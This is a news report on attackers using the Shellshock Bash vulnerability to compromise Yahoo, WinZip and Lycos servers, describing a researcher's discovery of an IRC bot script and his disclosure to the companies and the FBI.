14 DAY TRIAL // Hackers appearing to be of Romanian origin exploited the newly discovered Bash vulnerability to successfully compromise servers belonging to Yahoo, WinZip and Lycos, using them to run a malicious Perl script that scanned for new victims.
Although news about the Shellshock vulnerability in the Bash command interpreter for Linux and Unix systems has been out since September 24 and patches have been released, not all infrastructures have been immunized against it and threat actors continue to seek methods to exploit it in order to take over computer systems.
Cybercriminals gained complete control over two Yahoo servers
Security researcher Jonathan Hall from Future South Technologies discovered over the weekend that one of his computers, used for researching Shellshock exploits in the wild, received a request from a WinZIP server seeking common scripts in the cgi-bin directory.
Upon closer investigation, he learned that the server had been compromised by a group of hackers who used a modified script for an IRC DDoS bot to get a reverse shell.
Hall noticed that all the hosts running the attacker’s Perl script (ha.pl) were high profile and included machines administered by Yahoo, WinZip and Lycos. The bot connects to an IRC server and joins the channel #bash.
He discovered that the hackers managed to gain complete control over two Yahoo servers (dip4.gq1.yahoo.com and api118.sports.gq1.yahoo.com) and that they were “digging through the network and traversing it piece by piece.”
It appears that the goal of the intruders was to compromise Yahoo! Games servers, which are visited daily by millions of users who have Java installed on their systems in order to play the games. Java is well-known for being exploited by malicious actors.
Unfortunately for the researcher, his findings are not eligible for the Bug Bounty program.
Sever administrators have been contacted
Jonathan Hall used to be a black hat hacker indicted for crimes in the past, but he was never convicted. Since he’s had his brush with law enforcement in the past, he informed the affected parties about the intrusions, as well as the FBI.
After trying to get in touch with Yahoo through conventional means, he proceeded to contact Marissa Mayer directly, both over Twitter and via email. He received an answer from Ricky Connell, security expert at Yahoo, who confirmed the presence of the dangerous code.
It appears that after gaining root access to the servers, the hackers install malware to maintain control, but rely on old pieces, such as kaiten.c IRC-controlled DDoS bot.
WinZip has also been contacted with details about their server being compromised through the Shellshock vulnerability, but Hall’s post has not been updated with an answer from the company.
The black hat hacker now turned security researcher said that, in the case of WinZip, the compromised system was used “as a payment gateway for WinZip purchases,” and in the letter to them he specified that there was the possibility that the entire customer payment database was at risk.
Important to note is that servers attacked by the Romanian hackers ran unpatched versions of Bash.
[UPDATE, October 7]: After a initially confirming Hall's finding, Yahoo changed its statement and said that using a modified Shellshock exploit, the hackers triggered a different bug that allowed compromising the servers.